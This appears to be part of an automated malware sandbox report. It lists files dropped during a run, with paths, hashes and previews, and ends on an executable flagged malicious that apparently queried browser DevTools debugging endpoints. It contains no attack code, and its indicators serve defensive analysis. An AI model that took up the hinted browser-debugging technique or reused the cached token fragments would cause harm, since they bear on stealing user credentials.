                                                                                                                                                                                                                                                                Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9
                                                                                                                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:uriCache_

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                Entropy (8bit):5.020121174339423
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclR2zQWdM:YWLSGTt1o9LuLgfGBPAzkVj/T8lgzQaM
                                                                                                                                                                                                                                                                MD5:8D1853F54BCEFA2AFEBF2B1B815491D0
                                                                                                                                                                                                                                                                SHA1:68618EA3ACDBD40AC45A3F941ECAD6B4D741FA5D
                                                                                                                                                                                                                                                                SHA-256:F4249B280932C80A71105C5553FE79E38271D59652E7BCA877FA8D9D24115BE2
                                                                                                                                                                                                                                                                SHA-512:2E5B2A9AE2EBB402287E65FAABC4E6AF6B67F2B9A0FC6E3A9581E993D075698D92D90A78107270DD45A31946AC20EA312DEC3F2ABC29FF272EC81F8BDB47C747
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734454034238523}]}

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d3fd665a-8682-4e2c-a6d1-f19a7620fa4a.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                Size (bytes):44621
                                                                                                                                                                                                                                                                Entropy (8bit):6.095774627812403
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kN9LmZ0KabdzwVzE9A8KwWE7RTupzKscDX//NPC1os:z/Ps+wsI7ynVTKoRTuiVIos
                                                                                                                                                                                                                                                                MD5:4F31614D5BAD6107E1D4A0AC9A0FA590
                                                                                                                                                                                                                                                                SHA1:3A4398712C2A5AD7ECE1D1D289043DED565E71F3
                                                                                                                                                                                                                                                                SHA-256:14C283B1735AD278F1E5F3954E93F9126CAA99D2199368EE729A604289E78579
                                                                                                                                                                                                                                                                SHA-512:63FDEDF1552BAA87F070435B1B7F6B5151B2418E064B6853B13F5DF7B199EF70B3868B1C96F396AFEB9FC232DC1B04650A89471C180DF1718EED15C088BC05AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fe963251-c02d-46d5-a747-e0a48e741633.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45938
                                                                                                                                                                                                                                                                Entropy (8bit):6.088077396083364
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:xMkbJrT8IeQc5dXh2LmZ0KatZ1kndcQP8oYNxoZ20+YC1oAwWE7RTupzKscDX//n:xMk1rT8H1XMQYNGU0nIoAoRTuin
                                                                                                                                                                                                                                                                MD5:76040992826D68D33CFDCA961774EF3C
                                                                                                                                                                                                                                                                SHA1:7C237E7A7E1B45789DCCACD686532FC4974D325A
                                                                                                                                                                                                                                                                SHA-256:9BCDC6DE50475DE5715134D623AE34D36F1C5D0B7F5B990B418BF26E22C364B6
                                                                                                                                                                                                                                                                SHA-512:F489BE54FCF6480208C1921A50642C77AE03447EA061C809E2EFECE95F4A51F98FDD96184888863B2E623BF45E705D3792041C6AF7946C3E5F45BF91B82B3AD5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"591353d8-ec7b-485c-920d-b24610ab4123"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                                                                                                                Entropy (8bit):3.8648822327745886
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKxrgxBxl9Il8ugW37wMjKY1qbn4gPwfJQdHcY3u3rd1rc:mEYh7rjKY1Gn4tfedHZP
                                                                                                                                                                                                                                                                MD5:4A9E9D6D23A96990EAD4D53BE0F69D0D
                                                                                                                                                                                                                                                                SHA1:614581374D038732CD2EF03B102BDDFA44D9BFB2
                                                                                                                                                                                                                                                                SHA-256:482E6CBCEEC66B5BF249049B76FA62309B8E14B7D38A52CDCF15ACBA8E9DF091
                                                                                                                                                                                                                                                                SHA-512:398BD865E60077B75F4155C8EAEDE8287D7DEC07D5D6001C3E5B24D9610DB7A3D3458956E79BAC856CABDF42C0AACFA33F920F787CD949D626749FAB57067B8A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.H.A.Y.A.s.F.P.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.+.f.1.c.L.h.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                                                                                                                Entropy (8bit):3.9974099872914888
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:AYMtHpD100Ly5OJIkilr+gDnHWmw6tF5i:ALHUV5mIh+8nHWmw6pi
                                                                                                                                                                                                                                                                MD5:67FE6EEEF8A90BE6437D9C47ABD34324
                                                                                                                                                                                                                                                                SHA1:96A4753C6A10F230913B7753E7E3548B142A19B0
                                                                                                                                                                                                                                                                SHA-256:F76EDC23C722B2B2CE1519939BDE0061A44E9EF0E763A26DD9A270D24FAA941E
                                                                                                                                                                                                                                                                SHA-512:57AA4673B9D35E58A9ED67EE4A72E103B4E0BCEB5F5C81317D071F0A71176672594780F3B267674E8D16C431452EA8EA3DFD761F7BF557986BB13A30E1A21C24
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".y.e.N.H.6.L.h.P.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.+.f.1.c.L.h.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2684
                                                                                                                                                                                                                                                                Entropy (8bit):3.9061432237905165
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKx68Wa7x5Jxl9Il8ugWqz8X4go3VPwoCmKgdyOcOu6jb+eCd/vc:apYczEwKftg4Ohpd/
                                                                                                                                                                                                                                                                MD5:CEEF950E885028FD3A0F57DFD563FD55
                                                                                                                                                                                                                                                                SHA1:157057F7E6D87E5FD26E002FCAD67FCECDA92171
                                                                                                                                                                                                                                                                SHA-256:8714B44A56B11FAA70290AA6932AAA35262AFA1F2C0F8DAE1B2E4C983256DD45
                                                                                                                                                                                                                                                                SHA-512:AD5765A870CA4A8CEBB7E46A11293E12147411695DF8E36CFBE55E96D006CC05F1E53CE40DDC67DBB6CEE0D274D5F4571E99C73FD95194F922CC0995E30594EB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".X.M.w.m.G.Y.p.u.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.+.f.1.c.L.h.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\json[1].json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1787
                                                                                                                                                                                                                                                                Entropy (8bit):5.3676442045338355
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:SfNaoCpTEC/fNaoCUCifNaoCV5LxCVffNaoCcOtOiLd0UrU0U8CcOw:6NnCpTECXNnCUCKNnCVNxCV3NnCcWPdR
                                                                                                                                                                                                                                                                MD5:8E8A53D9F206888A2A0A62EB15CB33CB
                                                                                                                                                                                                                                                                SHA1:67B4AB7DAD9C8E1BBD6EC94FFA29036298BE5D46
                                                                                                                                                                                                                                                                SHA-256:FE6879940B2D57E756EFFD397DEA41AB98E605BF72ECD69208FAEB977E811B9C
                                                                                                                                                                                                                                                                SHA-512:B23A9C5670B9320F30F0056BD8BA4DCAED46520DD9D3D8E6DF2F618D3A82AE3B3438AA7680F1E687993ADA5C1C31DE2AA3D70533FA68B4B766B3AACCC3F300E6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/53AFD4726FCE8ED2DFAEF9ADF9435D11",.. "id": "53AFD4726FCE8ED2DFAEF9ADF9435D11",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/53AFD4726FCE8ED2DFAEF9ADF9435D11"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/C213DD4452881207559592B9CB9AE294",.. "id": "C213DD4452881207559592B9CB9AE294",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/C213DD4452881207559592B9CB9AE294"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\json[1].json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3500
                                                                                                                                                                                                                                                                Entropy (8bit):5.395158632564611
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:6NnCKHCCNnCAbCVNnCc9CvNnCxdgECnNnCMCnNnCIDCENnCmbgbKwCmbRNnCebhr:6NtNYNONq0NgNvhNtbgbKgbRNlb5
                                                                                                                                                                                                                                                                MD5:06EE9BF0ED041623B12302AF076116EF
                                                                                                                                                                                                                                                                SHA1:07D0D0DAE6AA3E937C32579FB4407027CC60EF1C
                                                                                                                                                                                                                                                                SHA-256:F7FE639E5410F73AACDEAA276B3193268857442BCEE6217A9E84CA04EAE342C9
                                                                                                                                                                                                                                                                SHA-512:F84D639F46C85D950F03B05CE6677FF1713DBF428CEF2F6506F3E039175DD2F57E61AD9FF17916DD14F829FDF94AA66560CC4BEF1D73E658DB2E5FD5C91A0DBE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/887DF107DAA917B63DC00ED9B94AB546",.. "id": "887DF107DAA917B63DC00ED9B94AB546",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/887DF107DAA917B63DC00ED9B94AB546"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4F4E3DFEBB0F3C015FA0A0CA89A6E51F",.. "id": "4F4E3DFEBB0F3C015FA0A0CA89A6E51F",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4F4E3DFEBB0F3C015FA0A0CA89A6E51F"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\493c1397-d4fe-4f1f-a7fb-42f2bdcee814.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\615578\Participating.com

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                Size (bytes):947288
                                                                                                                                                                                                                                                                Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Antivirus:
